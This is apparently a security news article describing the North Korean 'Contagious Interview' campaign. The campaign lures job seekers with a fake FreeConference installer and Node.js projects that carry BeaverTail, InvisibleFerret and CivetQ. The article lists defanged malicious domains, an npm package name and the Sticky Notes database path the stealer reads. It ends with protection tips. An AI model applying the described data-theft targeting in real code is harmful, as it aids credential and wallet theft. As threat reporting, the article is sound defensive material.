North Korean Hackers Leverage Fake Video Conferencing App for Malware Delivery
North Korean threat actors, known for their sophisticated cyberattacks, have been targeting job seekers with a fake Windows video conferencing application disguised as FreeConference.com. This malicious campaign, dubbed “Contagious Interview,” aims to backdoor developer systems for financial gain.
Contagious Interview: A Multi-Stage Attack Campaign
The Contagious Interview campaign, also tracked as DEV#POPPER, is orchestrated by a North Korean threat actor known as Famous Chollima, according to CrowdStrike. The attack chain begins with a fictitious job interview, luring unsuspecting job seekers into downloading and running a Node.js project that contains the BeaverTail downloader malware.
BeaverTail, in turn, delivers a cross-platform Python backdoor called InvisibleFerret, which grants attackers remote control over the compromised system, enabling them to steal sensitive information such as keystrokes, browser data, and even cryptocurrency wallet data.
Evolution of the Attack: From MiroTalk to FreeConference
Initially, the Contagious Interview campaign used a fake video conferencing software called MiroTalk, distributing it through Windows MSI installers and Apple macOS disk image (DMG) files. However, in July 2024, the threat actors shifted their focus to FreeConference.com, mimicking its branding with a fake installer named “FCCCall.msi.”
This phony installer is believed to be downloaded from a website named freeconference[.]io, which shares the same registrar as the fictitious mirotalk[.]net website.
Targeting Job Seekers on Multiple Platforms
“In addition to Linkedin, Lazarus is also actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork, and others,” security researcher Sharmine Low said.
“After making initial contact, they would often attempt to move the conversation onto Telegram, where they would then ask the potential interviewees to download a video conferencing application, or a Node.js project, to perform a technical task as part of the interview process.”
Expanding Reach and Targeting Cryptocurrency and Gaming Repositories
The threat actors have been observed injecting malicious JavaScript code into both cryptocurrency- and gaming-related repositories. This JavaScript code retrieves the BeaverTail Javascript code from the domains ipcheck[.]cloud or regioncheck[.]net, indicating a broader attack strategy.
This behavior was also recently highlighted by software supply chain security firm Phylum in connection with an npm package named helmet-validate, suggesting that the threat actors are simultaneously employing different propagation vectors.
BeaverTail’s Enhanced Capabilities: Stealing Cryptocurrency Data and Establishing Persistence
BeaverTail has been upgraded to extract data from more cryptocurrency wallet extensions, including Kaikas, Rabby, Argent X, and Exodus Web3. It also implements functionality to establish persistence using AnyDesk, a remote desktop software.
CivetQ: A Modularized Information Stealing Tool
BeaverTail’s information-stealing features are now realized through a set of Python scripts collectively called CivetQ. This modularized tool can harvest cookies, web browser data, keystrokes, clipboard content, and deliver more scripts. It targets a total of 74 browser extensions.
“The malware is able to steal data from Microsoft Sticky Notes by targeting the application’s SQLite database files located at:
%LocalAppData%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite, where user notes are stored in an unencrypted format,” Low said. “By querying and extracting data from this database, the malware can retrieve and exfiltrate sensitive information from the victim’s Sticky Notes application.”
Lazarus Group’s Evolving Tactics and Increased Creativity
The emergence of CivetQ highlights the modularized approach and constant evolution of the tools used by the Lazarus Group.
“Lazarus has updated their tactics, upgraded their tools, and found better ways to conceal their activities,” Low said. “
They show no signs of easing their efforts, with their campaign targeting job seekers extending into 2024 and to the present day. Their attacks have become increasingly creative, and they are now expanding their reach across more platforms.”
FBI Warning: North Korean Hackers Targeting Cryptocurrency Industry
The disclosure of the Contagious Interview campaign coincides with a warning from the U.S. Federal Bureau of Investigation (FBI) about North Korean cyber actors aggressively targeting the cryptocurrency industry. The FBI states that these actors use sophisticated social engineering attacks to facilitate cryptocurrency theft.
“North Korean social engineering schemes are complex and elaborate, often compromising victims with sophisticated technical acumen,” the FBI said in an advisory.
“Teams of North Korean malicious cyber actors identify specific DeFi or cryptocurrency-related businesses to target and attempt to socially engineer dozens of these companies’ employees to gain unauthorized access to the company’s network.”
Protecting Yourself from Contagious Interview and Similar Attacks
The Contagious Interview campaign highlights the importance of staying vigilant against social engineering attacks, especially when applying for jobs or engaging in online interactions. Here are some tips for protecting yourself:
- Be wary of unsolicited job offers: If you receive a job offer from an unknown source, verify the legitimacy of the company and the job opportunity.
- Avoid downloading software from untrusted sources: Only download software from official websites or reputable app stores.
- Be cautious of requests to download software during job interviews: If a potential employer asks you to download software for a technical assessment, question the request and ensure the software is legitimate.
- Use strong passwords and multi-factor authentication: Protect your online accounts with strong passwords and enable multi-factor authentication whenever possible.
- Keep your software up-to-date: Regularly update your operating system and applications to patch vulnerabilities that could be exploited by attackers.
The Contagious Interview campaign demonstrates the evolving tactics of North Korean cybercriminals and the importance of staying informed about the latest threats. By following these tips, you can help protect yourself from becoming a victim of these sophisticated attacks.
